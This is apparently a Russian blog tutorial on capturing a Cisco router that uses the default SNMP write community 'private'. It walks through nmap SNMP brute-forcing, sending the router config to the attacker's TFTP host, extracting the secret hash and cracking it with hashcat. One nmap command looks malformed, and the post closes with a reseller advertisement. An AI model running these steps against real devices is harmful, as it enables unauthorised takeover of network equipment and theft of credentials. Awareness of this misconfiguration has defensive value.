Хайповый заголовочек, не так ли? ) Ну не каждое, разумеется, устройство, можно захватить, но я приведу реально рабочий кейс, который может иметь место быть даже у вас в компании.
Суть атаки
Прикол весь в том, что зачастую можно встретить устройство Cisco с SNMP-комьюнити со стандартным именем и правами на запись. Как правило это строка “private”.
Посмотрим. Я заведомо разведал уже, что по IP адресу 192.168.0.130 находится роутер Cisco. Пока это всё, что мне известно.
# nmap -p161 -sU -sV 192.168.0.130
Функционирует SNMP – Simple Network Management Protocol. Мы ранее уже иногда с ним работали, занятная вещица. Управление в старых версиях осуществляется с использованием так называемого community-string – некий аналог пароля, который посылается в открытом виде. Типовые CS – public – для чтения и private для записи. Посмотрим, что имеется. Запустим скрипт перечисления популярных CS.
# nmap -sU -p161 --script snmp-brute 192.168.0.130
Типовая конфигурация. Чтож.
Теперь выкачаем конфиг с Cisco. Для этого нам надо запустить tftp-сервер на нашем узле и воспользоваться Perl-скриптом copy-router-config (в свежую Kali он уже входит).
# apt-get install tftpd-hpa
# /etc/init.d/tftpd-hpa start
TFTP-сервер работает несколько спецефично, поэтому подготовим ему каталог. По умолчанию он работает от пользователя tftp и рабочий каталог /srv/tftp
# touch /srv/tftp/1.txt
# chmod 777 /srv/tftp/1.txt
# chown -R tftp /srv/tftp
Подправим скрипт /usr/bin/copy-router-config.pl
Укажем имя файла 1.txt и путь в path – наш рабочий каталог.
Теперь выполним скрипт со следующими параметрами:
# copy-router-config.pl 192.168.0.130 192.168.0.101 private
0.101 – это адрес нашего узла, на котором запущен tftpd-сервер, а private – имя CS с соответствующими правами.
Как видим, в наш файл 1.txt залился конфиг Cisco-роутера.
Что делаем дальше?
# grep 'secret' 1.txt
Получаем хеш secret, который затем загоняем в hashcat на перебор:
Скорость не ахти, но есть возможность припахать карточку 2080 Ti, которая по некоторым хешам быстрее моей 1050 Ti в полтыщи раз ) надеюсь, на этом типе не хуже. Всё! После того, как пароль будет сбручен, считай, что железку мы захватили.
Способ 2
Пока я разбирался с Nmap, нашёл уже готовый скрипт! И не надо городить всё это было, достаточно просто сделать так:
# nmap -sU -p 161 --script-ios-config --script-args creds.snmp=:private 192.168.0.130
Работали с многими устройствами Cisco. Если оставлять настройки по умолчанию – есть масса способов подломить железку. Cisco – очень популярный производитель для Enterprise сегмента, поэтому в эту сторону очень много внимания со стороны хакеров. SOHO-девайсы всё-таки не так часто ковыряют. А что касается закупок оборудования Cisco – могу предложить вот такой вариант – https://eddp.ru/catalog/cisco/.
И если сисадмин сам не обладает нужными знаниями – остаётся обращаться за помощью к интеграторам или на аутсорс. Всё решаемо)